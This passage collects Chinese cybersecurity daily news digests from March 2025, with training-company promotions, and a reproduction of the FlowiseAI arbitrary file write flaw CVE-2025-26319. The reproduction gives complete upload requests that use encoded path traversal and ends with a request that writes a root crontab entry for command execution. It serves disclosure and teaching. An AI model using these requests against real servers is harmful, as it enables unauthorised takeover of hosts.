网络安全日报 2025年03月31日
1、APT36创建虚假的印度邮政网站进行攻击活动
https://www.cyfirma.com/research/turning-aid-into-attack-exploitation-of-pakistans-youth-laptop-scheme-to-target-india/ 研究人员发现了一个冒充印度邮局的恶意网站,该网站传播一个恶意安卓应用程序和一个针对Windows用户的PDF文件。当用户通过Windows访问该网站时,该网站会投放一个包含“ClickFix”策略的恶意PDF文件。该文档指示用户按“Win+R”键,将提供的恶意PowerShell命令粘贴到“运行”对话框中执行。而当用户通过安卓端访问时,该网站会下载一个名为
2、Mozilla修复Firefox中的一个安全漏洞
https://www.bleepingcomputer.com/news/security/mozilla-warns-windows-users-of-critical-firefox-sandbox-escape-flaw/ Mozilla发布了Firefox 136.0.4,以修复一个安全漏洞,该漏洞可以让攻击者逃逸Windows系统上的Web浏览器沙箱。此漏洞被标识为CVE-2025-2857,虽然Mozilla还没有分享有关CVE-2025-2857的技术细节,但Mozilla表示该漏洞类似于谷歌刚刚修复的Chrome零日漏洞。该漏洞只影响Windows系统上的Firefox,其
3、马来西亚吉隆坡国际机场遭受网络攻击
https://therecord.media/malaysia-pm-says-country-rejected-ransom-demand-airport-cyberattack 马来西亚网络安全机构和航空管理局称,马来西亚吉隆坡国际机场(KLIA)3月23日因遭受网络攻击而导致计算机中断。马来西亚总理证实了此次事件,并表示攻击者针对的是运营该国大部分机场的马来西亚机场控股公司(MAHB),并索要1000万美元的赎金。该国拒绝了攻击者关于1000万美元的勒索要求,目前没有透露此次攻击的幕后黑手,也没有任何组织声称对此次事件负责。
4、研究人员发现利用Discord API的远控木马
https://www.cyfirma.com/research/analysis-of-a-discord-based-remote-access-trojan-rat/ 研究人员发现并分析了一种基于Python的远控木马(RAT),该木马利用Discord API作为命令和控制(C2)服务器,执行任意系统命令、窃取敏感信息、捕获屏幕截图以及操纵本地计算机和Discord服务器。研究人员对该远控木马进行了深入分析,并提供了防护建议。
5、研究人员发现安卓恶意软件Crocodilus
https://www.threatfabric.com/blogs/exposing-crocodilus-new-device-takeover-malware-targeting-android-devices 研究人员近期发现了以前从未见过的样本,经分析发现是新型安卓恶意软件,研究人员根据其开发者留下的信息将其命名为“Crocodilus”。尽管该恶意软件是新的,但它已经具备覆盖攻击、键盘记录、远程访问和远程控制等功能。研究人员已经发现攻击者利用该恶意软件针对西班牙和土耳其的银行用户以及流行加密货币钱包进行攻击。
6、RESURGE恶意软件利用Ivanti中的漏洞进行攻击
https://www.cisa.gov/news-events/alerts/2025/03/28/cisa-releases-malware-analysis-report-resurge-malware-associated-ivanti-connect-secure 美国网络安全和基础设施安全局(CISA)发布了一份恶意软件分析报告,其中包含对识别为RESURGE的一种恶意软件变种的分析和检测规则。RESURGE恶意软件对Ivanti Connect Secure设备中CVE-2025-0282漏洞进行恶意利用,该漏洞是Ivanti Connect Secure、Policy Sec
7、研究人员发现新型恶意软件SHELBY
https://www.elastic.co/security-labs/the-shelby-strategy 研究人员在分析一封网络钓鱼邮件时发现了SHELBY恶意软件。SHELBY恶意软件滥用GitHub进行命令和控制,窃取数据并接收命令。此外,研究人员在攻击者的C2设计中发现一个严重缺陷,任何拥有个人访问令牌(PAT)的人都可以控制受感染的计算机。该恶意软件中存在的未使用代码表明攻击者仍在进行开发,这表明该恶意软件未来可能会出现新的版本。
8、Splunk修复其产品中的数十个安全漏洞
https://www.securityweek.com/splunk-patches-dozens-of-vulnerabilities/ Splunk为其产品发布数十个安全漏洞修复补丁,其中包括Splunk Enterprise和Secure Gateway App中的两个高危漏洞。Splunk还修复Splunk Enterprise中的中危安全漏洞,这些漏洞可能导致维护模式修改、安全防护绕过、信息泄露和操纵其他用户数据。Splunk没有提到这些漏洞被利用的情况。建议用户尽快更新其Splunk Enterprise实例和其他受影响的Splunk应用程序。
9、Oracle Health发生数据泄露事件
https://www.bleepingcomputer.com/news/security/oracle-health-breach-compromises-patient-data-at-us-hospitals/ Oracle Health公司表示,他们在2025年2月20日发现了遗留的Cerner数据迁移服务器中的数据遭到泄露。攻击者在2025年1月22日之后的某个时间,使用泄露的客户凭据入侵了服务器,并窃取了数据。这些泄露的数据中可能包含电子健康记录中的患者信息。Oracle Health公司尚未公开披露此事件,但给受影响的客户发送了私人通信。目前尚不清楚此次攻击中是否部署了勒索软
10、Telegram560 亿条公开群聊记录被索引,涉 8.6 亿用户
https://www.freebuf.com/news/426083.html 即时通讯平台 Telegram 上出现一个名为 Funstatgrtbot 的机器人,引发了广泛关注和用户对隐私的担忧。据报告,该机器人已成功抓取并索引了 Telegram 公开群组和频道中高达 560 亿条的用户发言记录,时间跨度至少六年,涉及约 8.6 亿 Telegram 用户和 3600 万个公开群组及频道。
声明
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
蚁景科技荣膺双项殊荣,引领网络安全教育新潮流
导语:湖南蚁景科技在行业中脱颖而出,一举斩获 “2024年度湖南湘江新区在线教育行业红名单企业” 以及 “2024年度湖南湘江新区互联网在线教育行业成长企业” 两项重磅殊荣,彰显其强劲实力与发展潜力。
2025年3月21日,湖南湘江新区互联网在线培训行业协会 2024 年度表彰大会暨企业战略目标管理峰会盛大举行。本次大会以 “聚力・变革・破局” 为主题,汇聚各方力量,共商在线教育发展的崭新篇章,为行业发展注入新的活力与方向。
领导致辞
湖南湘江新区商务和市场监管局领导及相关处室负责人、本地权威媒体代表、湘江新区互联网在线培训行业协会会长以及 50 余家会员单位代表齐聚一堂,共同见证这一行业盛事。湖南湘江新区商务和市场监管局党组成员、岳麓区市监局局长吴卫先生在大会上发表开幕致辞。他全面回顾了过去一年行业在规范化发展方面取得的显著成效,并对行业未来发展提出了三点殷切期望:一是严守合规底线,确保行业健康有序发展;二是聚力服务大局,为区域经济社会发展贡献力量;三是积极践行社会责任,树立良好行业形象。
在众多优秀企业中,湖南蚁景科技有限公司凭借其在行业发展进程中的卓越表现脱颖而出,成功摘得 “2024 年度湖南湘江新区在线教育行业红名单企业” 与 “2024 年度湖南湘江新区互联网在线教育行业成长企业” 两项含金量十足的荣誉。这不仅是对蚁景科技过去一年辛勤耕耘的高度认可,更是对其未来持续创新发展的有力鞭策。
蚁景科技代表在发言中表示,此次荣获双项荣誉,是公司发展历程中的重要里程碑。这既是对过往努力的肯定,更是激励公司不断前行的动力源泉。蚁景科技将以这两项荣誉为新的起点,持续加大在技术创新与人才培养方面的投入力度,积极为湖南湘江新区打造 “在线教育湘军” 品牌添砖加瓦。同时,蚁景科技也呼吁更多同行企业携手共进,凝聚行业力量,共同开拓在线教育行业的美好新未来。
关于蚁景网安学院
蚁景网安学院已推出覆盖Web安全攻防、渗透测试实战、CTF竞赛特训、Python安全开发等热门网安领域的课程体系,深度对接企业用人需求,构建起"知识学习-技能实战-就业内推"的人才培养生态,精准打通网络安全人才输送的"最后一公里"。
我们将坚定不移地持续优化人才培养体系、推进技术创新、促进人才生态的良性发展,矢志不渝地致力于培育更多高素质、高水平的网络安全专业精英人才,全力推动网络安全技术教学的深度创新与广泛应用,为全面提升网络安全人才的实战能力贡献更多力量,助力网络安全行业迈向新的高峰。
网络安全日报 2025年03月28日
1、RedCurl组织使用QWCrypt勒索软件进行攻击
https://www.bitdefender.com/en-us/blog/businessinsights/redcurl-qwcrypt-ransomware-technical-deep-dive 研究人员称,RedCurl组织正在使用QWCrypt勒索软件针对Hyper-V虚拟机进行攻击。随着企业越来越多地转向虚拟机来托管其服务器,勒索软件团伙也紧随这一趋势,创建专门针对虚拟化平台的加密器。大多数勒索软件都在针对VMware ESXi服务器,而RedCurl的新型“QWCrypt”勒索软件则针对托管在Hyper-V上的虚拟机。在加密文件时,QWCrypt使用XChaCha20-Po
2、谷歌修复了Chrome中的一个零日漏洞
https://www.bleepingcomputer.com/news/security/google-fixes-chrome-zero-day-exploited-in-espionage-campaign/ 谷歌修复了一个高危的Chrome零日漏洞,该漏洞被用于逃避浏览器的沙箱,并在针对俄罗斯媒体机构和教育组织的攻击中部署恶意软件。该漏洞被标识为CVE-2025-2783,虽然谷歌将该漏洞标记为在攻击活动中被恶意利用,但目前尚未分享有关该漏洞的详细信息。研究人员发布了一份报告,其中包含更多详细信息,称攻击者使用CVE-2025-2783漏洞利用程序绕过Chrome沙箱保护,并使用复
3、Arkana Security勒索组织声称入侵了WideOpenWest的系统
https://www.securityweek.com/new-ransomware-group-claims-attack-on-us-telecom-firm-wideopenwest/ 一个名为“Arkana Security”的新勒索软件组织声称入侵美国电信运营商WideOpenWest(WOW!)的系统,并控制了关键系统,此外还窃取了客户信息。该勒索组织称,他们窃取了两个数据库,一个包含40.3万个帐户,另一个包含 220万个帐户,其中包含用户名、帐户 ID、密码、安全信息、姓名、电子邮件、权限和Firebase集成详细信息等。WOW!尚未对此次攻击及数据泄露事件进行确认。
4、俄罗斯卢克石油公司遭受网络攻击
https://newsukraine.rbc.ua/news/russian-lukoil-hit-by-large-scale-cyberattack-1742981848.html 俄罗斯卢克石油公司于3月26日遭受大规模黑客攻击。俄罗斯在线媒体Baza报道称,该公司整个系统自早上以来一直瘫痪。根据Baza的消息来源,公司员工无法访问他们的工作电脑,并且屏幕上显示了一条关于故障的消息。所有员工都被要求不要使用用户名和密码登录其工作帐户,以防止数据泄露。目前,客户端用户系统和公司内部数据库的访问权限均已关闭。
5、Oracle客户确认攻击者声称泄露的数据有效
https://www.bleepingcomputer.com/news/security/oracle-customers-confirm-data-stolen-in-alleged-cloud-breach-is-valid/ 上周,一个名为“rose87168”的攻击者声称入侵了Oracle云服务器,并开始出售据称600万用户的身份验证数据和加密密码。尽管当时Oracle否认了此次事件,但其一些客户公司的代表确认了数据的真实性。这些公司的代表表示,相关的LDAP显示名称、电子邮件地址、名字和其他识别信息都是正确的,并且属于他们。Oracle目前尚未对此进行回应。
6、Splunk 高危漏洞:攻击者可通过文件上传执行任意代码
https://www.freebuf.com/vuls/425878.html Splunk 近日发布补丁,修复了影响 Splunk Enterprise 和 Splunk Cloud Platform 的高危远程代码执行(RCE)漏洞。该漏洞编号为 CVE-2025-20229,可能允许低权限用户通过上传恶意文件执行任意代码。
7、加密货币盗窃案主犯"Wiz"落网 涉案金额达2.43亿美元
https://www.freebuf.com/news/425807.html 美国法警近日逮捕了2.43亿美元加密货币盗窃案的关键嫌疑人维·切塔尔(Veer Chetal),其网络代号为"Wiz"。区块链调查员ZachXBT通过推特公布了这一案件进展。
8、恶意npm包修改本地ethers库以发起反向Shell攻击
https://thehackernews.com/2025/03/malicious-npm-package-modifies-local.html 网络安全研究人员在 npm 注册表中发现了两个恶意软件包,旨在感染另一个本地安装的软件包。有问题的软件包是ethers-provider2和ethers-providerz,前者自2025 年 3 月 15 日发布以来已被下载 73 次。第二个软件包很可能被恶意软件作者自己删除,因此没有吸引任何下载。
9、macOS 用户警惕 ReaderUpdate 恶意软件新版本
https://www.securityweek.com/macos-users-warned-of-new-versions-of-readerupdate-malware/ 据 SentinelOne 报道,macOS 恶意软件加载器 ReaderUpdate 背后的威胁行为者使用 Crystal、Nim、Rust 和 Go 编程语言构建了该威胁的新版本。
10、Appsmith 开发工具漏洞使攻击者可执行远程代码
https://cybersecuritynews.com/appsmith-developer-tool-remote-code/ 安全研究人员发现了用于构建内部应用程序的流行开源开发平台 Appsmith 中存在多个严重漏洞。 最令人担忧的是 CVE-2024-55963,它允许未经身份验证的攻击者在运行 Appsmith 版本 1.20 至 1.51 的默认安装的服务器上执行任意系统命令。
声明
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
FlowiseAI 任意文件写入漏洞(CVE-2025–26319)
漏洞简介
Flowise是一款与LangChain兼容的开源低代码工具,使普通用户和开发人员都能通过可视化连线方式创建LLM工作流和AI应用。然而该平台存在严重的文件上传漏洞——尽管Flowise实施了上传校验机制,攻击者仍可通过特殊编码绕过限制,实现任意目录的文件写入。这一安全缺陷使未经授权的攻击者能够上传恶意文件、脚本或SSH密钥,从而获取对托管服务器的远程控制权,对使用该平台构建AI代理的组织构成重大安全威胁。
漏洞复现
安装环境后构造上传的数据包
POST /api/v1/attachments/test/test HTTP/1.1
Host: localhost:3000
Accept: application/json, text/plain, */*
x-request-from: internal
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:3000/apikey
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Length: 215
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="files"; filename="test.txt"
Content-Type: text/plain
This is the content of the file.
------WebKitFormBoundary7MA4YWxkTrZu0gW--
在服务器上查找上传文件的位置
再次构造数据包
POST /api/v1/attachments/..%2ftest/test HTTP/1.1
Host: localhost:3000
Accept: application/json, text/plain, */*
x-request-from: internal
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:3000/apikey
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Length: 215
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="files"; filename="test.txt"
Content-Type: text/plain
This is the content of the file.
------WebKitFormBoundary7MA4YWxkTrZu0gW--
在服务器上再次查找文件位置
成功实现跨越目录的上传操作
进一步的进行利用的话 可以通过向定时任务中写入文件实现任意命令执行
POST /api/v1/attachments/..%2f..%2f..%2f..%2f..%2fusr/..%2fvar%2fspool%2fcron%2fcrontabs HTTP/1.1
Host: localhost:3000
Accept: application/json, text/plain, */*
x-request-from: internal
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:3000/apikey
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Length: 657
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="files"; filename="root"
Content-Type: text/plain
# do daily/weekly/monthly maintenance
# min hour day month weekday command
*/15 * * * * run-parts /etc/periodic/15min
0 * * * * run-parts /etc/periodic/hourly
0 2 * * * run-parts /etc/periodic/daily
0 3 * * 6 run-parts /etc/periodic/weekly
0 5 1 * * run-parts /etc/periodic/monthly
* * * * * echo "a" >> /tmp/test.txt
------WebKitFormBoundary7MA4YWxkTrZu0gW--
漏洞分析
在Flowise平台的核心架构中,通过constants.ts 文件定义了一系列无需认证即可访问的API端点,这些端点被归类为WHITELIST_URLS 。该设计允许特定功能(如API密钥验证、公共聊天流和文件操作等)在未经认证的情况下运行,以提高用户体验和系统灵活性。
Flowise-main/packages/server/src/utils/constants.ts
当服务器接收到新的HTTP请求时,其鉴权流程遵循严格的逻辑顺序:首先检查请求路径是否包含"/api/v1"前缀(不区分大小写);接着进行大小写敏感的路径验证;随后系统会判断该URL是否存在于预定义的白名单中。若请求路径已被列入白名单,则继续处理;否则,系统会进一步检查请求头中是否包含"internal"标记,或尝试验证API密钥。
Flowise-main/packages/server/src/index.ts
Flowise-main/packages/server/src/routes/attachments/index.ts
Flowise-main/packages/server/src/services/attachments/index.ts#createFileAttachment
/api/v1/attachments/ 路由下存在上传创建文件的操作
Flowise-main/packages/server/src/utils/createAttachment.ts#createFileAttachment
createFileAttachment 中会调用 addArrayFilesToStorage 来对文件进行处理
此时我们也可以看到对应的所有上传路由 /api/v1/attachments/:chatflowId/:chatId
Flowise-main/packages/components/src/storageUtils.ts#addArrayFilesToStorage
在 addArrayFilesToStorage 中对文件地址进行处理时,会将 chatflowId 和 chatId 未经处理也直接拼接到路径中,所以可以通过编码就直接绕过目录限制实现跨目录的上传。
网络安全日报 2025年03月27日
1、攻击者通过恶意邮件传播SnakeKeylogger窃密木马
https://www.seqrite.com/blog/snakekeylogger-a-multistage-info-stealer-malware-campaign/ 研究人员近期发现一个恶意软件活动,该活动将SnakeKeylogger作为最终载荷植入到目标系统中。初始诱饵文件是一个包含.img文件的恶意电子邮件。该.img文件中含有一个伪装成PDF文档的可执行程序,攻击者以此诱导用户执行该程序。该程序是由.NET编写的下载器,它会连接远程服务器并下载后续载荷,并最终植入SnakeKeylogger。
2、CrushFTP修复一个安全漏洞并提醒用户尽快更新
https://www.bleepingcomputer.com/news/security/crushftp-warns-users-to-patch-unauthenticated-access-flaw-immediately/ CrushFTP修复未经身份验证的HTTP(S)端口访问漏洞,并提醒用户立即对CrushFTP进行更新。如果未修复该漏洞的服务器通过HTTP(S)在网络中公开,则攻击者能够利用此安全漏洞获得未经身份验证的访问权限。CrushFTP于2025年3月21日对该漏洞进行修复,很快将会对其分配CVE编号。用户应立即更新至CrushFTP v11.3.1+版本,无法更新
3、博通修复VMware Tools for Windows中的一个安全漏洞
https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/25518 博通发布安全更新,修复VMware Tools for Windows中的一个身份验证绕过漏洞。该漏洞被标识为CVE-2025-22230(CVSS评分7.8),是由不正确的访问控制缺陷引起的,具有低权限的本地攻击者可以在不需要用户交互的低复杂性攻击中利用它,从而在易受攻击的虚拟机上获得高权限。
4、Cloudflare R2服务中断事件:密码轮换错误引发全球故障
https://www.freebuf.com/news/425731.html Cloudflare近日宣布,其R2对象存储及相关服务发生了一次持续1小时7分钟的中断事件,导致全球范围内出现100%的写入失败和35%的读取失败。Cloudflare R2是一项可扩展的、与S3兼容的对象存储服务,提供免费数据检索、多区域复制以及与Cloudflare的深度集成。
5、新Windows零日漏洞泄露NTLM哈希值,非官方补丁已发布
https://www.freebuf.com/vuls/425728.html 针对一个新的Windows零日漏洞(zero-day vulnerability),现已提供免费的非官方补丁。该漏洞允许远程攻击者通过诱骗目标在Windows资源管理器中查看恶意文件来窃取NTLM(NT LAN Manager)凭据。NTLM协议已被广泛用于NTLM中继攻击(NTLM relay attacks,即威胁行为者迫使易受攻击的网络设备向攻击者控制的服务器进行身份验证)和哈希传递攻击(pass-the-hash attacks,即利用漏洞窃取NTLM哈希值,这些哈希值是经过哈希处理的密码)。攻击者随后
6、FBI警告:警惕免费在线文档转换工具
https://www.csoonline.com/article/3853045/fbi-warns-beware-of-free-online-document-converter-tools.html 加拿大安全意识培训提供商Beauceron Security的负责人David Shipley回应了FBI丹佛外勤办公室本月早些时候发布的警告,该警告指出,利用免费在线文档转换工具窃取信息或在用户电脑上加载恶意软件的诈骗行为正在增加。
7、CloudSEK 提供新证据反驳 Oracle 否认数据泄露
https://hackread.com/cloudsek-disputes-oracle-data-breach-denial-evidence/ Oracle 目前正陷入一场网络安全风波,有消息称其云基础设施遭受了大规模数据泄露。上周,Hackread.com 发布了一篇文章,基于网络安全公司 CloudSEK 的调查结果,揭示了一名威胁行为者从 Oracle 云中窃取了 600 万条记录。
8、Gartner发布2025年网络安全重要趋势
https://mp.weixin.qq.com/s/8KhOhOlIZ2vtaBVpu-gVuA Gartner公司于近日发布2025年网络安全重要趋势。这些趋势受到包括生成式人工智能(GenAI)的演进、数字去中心化、供应链相互依存、监管变化、地方性人才短缺和不断变化的威胁态势等在内的因素影响。
9、Cloudflare推出AI迷宫:新型策略应对AI爬虫
https://cybersecuritynews.com/cloudflare-unveils-ai-labyrinth-a-new-approach-to-exhaust-ai-crawlers/ Cloudflare近日推出了名为“AI迷宫”的创新工具,旨在通过将未经授权的网络爬虫重定向到一个由AI生成内容的无限迷宫中,来应对这些恶意爬虫。
10、Chrome 严重漏洞或致攻击者执行任意代码
https://www.anquanke.com/post/id/305483 Google 已确认 Chrome 浏览器存在一个严重安全漏洞,该漏洞影响着 Windows、Mac、Linux 和Android 平台上的数十亿用户。
声明
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
荣耀再续 | 蚁景科技在第136届广交会测试赛中再获团体亚军佳绩
近日,在备受瞩目的第 136 届广交会网络平台测试赛中,蚁景科技凭借卓越表现与精湛技术脱颖而出。此次比赛由中国网络空间安全教育论坛(简称 “网教盟”)主办,蚁景科技团队斩获团体积分 132 分,再度荣膺第二名的佳绩,续写荣誉篇章。
这已经是蚁景科技连续三届在广交会测试赛中稳坐亚军宝座,实力不容小觑。此次测试赛竞争激烈,蚁景科技精英讲师带领多名学员在比赛中大显身手,尽显超凡的网安技术功底与深厚专业素养。其中,蚁景科技的一叶讲师协同 2 名学员表现尤为亮眼,分别以第 4 名、第 5 名和第 7 名的傲人成绩,强势闯入本次测试赛个人排行榜前十,再度为公司争得荣光,有力印证了蚁景科技在网络安全人才培养领域的领先地位以及深厚人才储备优势。
此次再获突破性成果,一方面展现出蚁景科技在网络安全领域的专业硬实力,另一方面凸显其坚定不移地持续深耕人才培养、加大技术研发投入的决心。借助参与此类高规格竞赛实战契机,蚁景科技在磨砺学员技术、提升实战水平的同时,也为网络安全领域蓬勃发展注入源源不断的动力,持续书写属于自己的荣耀篇章。
关于蚁景科技
湖南蚁景科技有限公司,作为专业的“网络安全人才培养服务提供商”,致力于配合国家网络安全人才培养战略,精准对接行业人才市场的需求。公司秉承提升网络安全实战能力为核心的培养目标,紧密结合用人单位在网络安全岗位上的技能要求,提供前沿、系统且专业的网络安全实战技能培训。同时也针对政企单位、科研院所等行业客户,量身定制网络安全培训方案,以满足其特定的培训需求。
此外,蚁景科技紧密结合高校网络安全人才培养体系,基于对“互联网+教育”的精准把握,依托自主研发的网络安全人才实训平台——蚁景网安实验室,高效构建多样化的网络安全实验场景,全面满足高校教师的在线实验教学需求,同时也为网络安全爱好者提供了优质的在线实操学习环境。
网络安全日报 2025年03月26日
1、谷歌确认并修复Chrome中的一个严重安全漏洞
https://cybersecuritynews.com/chrome-vulnerability-allows-arbitrary-code/ 谷歌已经确认Chrome中存在一个严重的安全漏洞,该漏洞可能允许攻击者通过特制的网页执行任意代码,影响Windows、Mac、Linux和Android平台上的数十亿用户。谷歌发布了紧急更新版本,以修复该漏洞。该漏洞被标识为CVE-2025-2476,被归类为Chrome Lens组件中的释放后重用(UAF)漏洞,成功利用此漏洞可能允许攻击者以与登录用户相同的权限执行任意代码。目前尚未确认该漏洞被恶意利用,谷歌发布了安全更新以修复该漏洞,用户应立
2、乌克兰国家铁路运营商Ukrzaliznytsia遭受网络攻击
https://www.bleepingcomputer.com/news/security/cyberattack-takes-down-ukrainian-state-railways-online-services/ 乌克兰国家铁路运营商Ukrzaliznytsia遭受一次大规模的网络攻击,这导致通过移动应用程序和网站购买车票的在线服务中断。Ukrzaliznytsia在多个通信渠道的官方声明中证实了此次事件,并对造成的不便表示歉意。尽管在线售票平台出现问题,但Ukrzaliznytsia在其公告中指出,旅行运营方面并未受到网络攻击的影响。该运营商在最新发出的声明中表示,列车运行保持稳
3、新型钓鱼攻击瞄准macOS用户,伪造安全警报
https://www.freebuf.com/news/425599.html LayerX Labs 最近发布的一份报告揭示了一场新的钓鱼攻击活动,该活动最初旨在欺骗 Windows 用户,但最近将目标转向了 macOS 用户。LayerX Labs 对该活动进行了数月的监控,发现攻击者最初伪装成微软安全警报,试图窃取用户凭证。
4、新型钓鱼诈骗:假冒Instagram聊天机器人窃取账户
https://hackread.com/phishing-scam-fake-instagram-chatbots-hijack-accounts/ 近日,一种新型钓鱼攻击活动正在诱骗用户交出他们的Meta商务账户(尤其是Instagram账户)的访问权限。Cofense钓鱼防御中心检测到,该诈骗活动通过假冒的聊天支持、详细的操作说明,并试图将自己添加为安全登录方式,从而劫持商务账户。
5、新型VanHelsing勒索软件瞄准Windows、ARM和ESXi系统
https://www.freebuf.com/articles/system/425606.html 一种名为VanHelsing的新型多平台勒索软件即服务(RaaS)操作已经出现,其目标包括Windows、Linux、BSD、ARM和ESXi系统。VanHelsing于3月7日首次在地下网络犯罪平台上推广,为有经验的合作伙伴提供免费加入的机会,而经验不足的威胁行为者则需要缴纳5000美元的保证金。
6、新型Linux内核Rust模块发布,专为检测Rootkit而生
https://www.freebuf.com/articles/system/425586.html 在对抗复杂Linux恶意软件的持续斗争中,一款突破性的安全工具应运而生。近日,一款基于Rust语言开发的内核模块正式发布,专门用于检测Rootkit,为识别这些极其隐蔽的威胁提供了更强大的能力。
7、2 月勒索软件攻击暴增 50%,Cl0p 成最大安全隐患
https://www.anquanke.com/post/id/305365 根据NCC Group的一份报告,与前一个月相比,2 月份勒索软件攻击数量激增 50%,达到了前所未有的 886 起。该报告显示,与 2024 年 2 月记录的 403 起攻击相比,勒索软件事件数量增长了 119%。研究的关键发现指出,网络犯罪团伙 Cl0p 最为活跃,实施了其中 37% 的攻击。
8、非法抓取使用数十亿张人脸照片,Clearview AI赔偿23%股权
https://www.secrss.com/articles/76972 美国芝加哥一名联邦法官近日批准了一项具有创新性的全国性集体诉讼和解协议。该协议旨在解决针对人脸识别公司Clearview AI的隐私诉讼,但不会立即向受害者支付任何具体金额的赔偿。
9、Intel Security Fusese加密密钥泄漏
https://swarm.ptsecurity.com/last-barrier-destroyed-or-compromise-of-fuse-encryption-key-for-intel-security-fuses/ Intel CSME(企业安全管理引擎)可以说是当前最复杂的带外平台之一,然而厂商对此并未提供足够的透明度。
10、K8s Ingress NGINX 控制器曝高危漏洞,无需认证即可远程执行代码
https://www.freebuf.com/vuls/425603.html Kubernetes 的 Ingress NGINX Controller 中披露了五个严重的安全漏洞,可能导致未经认证的远程代码执行(RCE)。这些漏洞使得超过 6,500 个集群面临直接风险,因为它们将组件暴露在公共互联网上。这些漏洞(CVE-2025-24513、CVE-2025-24514、CVE-2025-1097、CVE-2025-1098 和 CVE-2025-1974)的 CVSS 评分为 9.8,被云安全公司 Wiz 统称为 IngressNightmare。值得注意的是,这些漏洞并不影响 N
声明
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
网络安全日报 2025年03月25日
1、研究人员发现Albabat勒索软件新变种
https://www.trendmicro.com/en_ph/research/25/c/albabat-ransomware-group.html 研究人员发现了Albabat勒索软件的新变种,这些新变种表明该勒索组织可能将目标从Windows系统扩展到Linux和macOS系统。新变种通过GitHub REST API检索其配置数据,配置数据提供了有关勒索软件行为和操作参数的详细信息。Albabat勒索软件在加密文件时会跳过特定的文件和文件夹,终止指定的目标进程。此外,该勒索软件会从受感染计算机中窃取信息,其中包括系统详细信息、用户信息、地理位置数据、加密状态以及有关赎金支付的详细信
2、攻击者利用Checkpoint驱动程序进行BYOVD攻击
https://venaksecurity.com/2025/03/20/cybercriminals-exploit-checkpoints-driver-in-a-byovd-attack/ 研究人员最近发现一个复杂的网络攻击,攻击者利用Checkpoint的ZoneAlarm反病毒软件的内核级驱动程序vsdatant.sys进行攻击。vsdatant.sys中存在的缺陷允许攻击者提升权限并绕过关键的Windows安全功能(例如内存完整性),并从受感染的系统中提取敏感数据。此外,攻击者还建立了到受感染系统的远程桌面协议(RDP)连接,从而能够保持对受感染机器的持久访问。
3、Kemp LoadMaster修复一个缓冲区溢出漏洞
https://securityonline.info/cve-2025-1758-critical-buffer-overflow-in-kemp-loadmaster-opens-door-to-remote-code-execution/ 研究人员在Progress Software的Kemp LoadMaster中发现了一个安全漏洞,该漏洞被标识为CVE-2025-1758(CVSS评分为9.8),是一个基于堆栈的缓冲区溢出漏洞。该问题存在于mangle可执行文件中,该文件是LoadMaster中负责处理数据输入操作的组件。此漏洞影响7.2.61.1之前的多个LoadMaster版本
4、Next.js 严重漏洞:攻击者可绕过中间件授权检查
https://www.freebuf.com/vuls/425556.html Next.js React 框架近日披露了一个严重的安全漏洞,攻击者可在特定条件下利用该漏洞绕过授权检查。该漏洞被标记为 CVE-2025-29927,其 CVSS 评分为 9.1(满分 10.0)。Next.js 在公告中表示:“Next.js 使用内部标头 x-middleware-subrequest 来防止递归请求触发无限循环。然而,攻击者可能通过跳过中间件的执行,使请求在到达路由之前绕过关键检查,例如授权 Cookie 验证。”该漏洞已在版本 12.3.5、13.5.9、14.2.25 和 15.2.
5、黑客声称窃取600万条记录,甲骨文否认数据泄露
https://www.freebuf.com/articles/database/425459.html CloudSEK的XVigil平台近期调查发现,一起针对甲骨文云(Oracle Cloud)的网络攻击导致600万条记录被窃取,可能影响超过14万名租户。据报道,一名名为“rose87168”的威胁行为者实施了此次攻击,窃取了包括JKS文件、加密的SSO密码、密钥文件和企业管理器JPS密钥在内的敏感数据,这些数据目前正在Breach Forums和其他暗网论坛上出售。然而,甲骨文发布声明否认其云基础设施遭到入侵。甲骨文在回应报告时表示 :“甲骨文云并未遭到入侵。公布的凭证并非用于甲骨文
6、Cloudflare全面禁止未加密流量访问其API端点
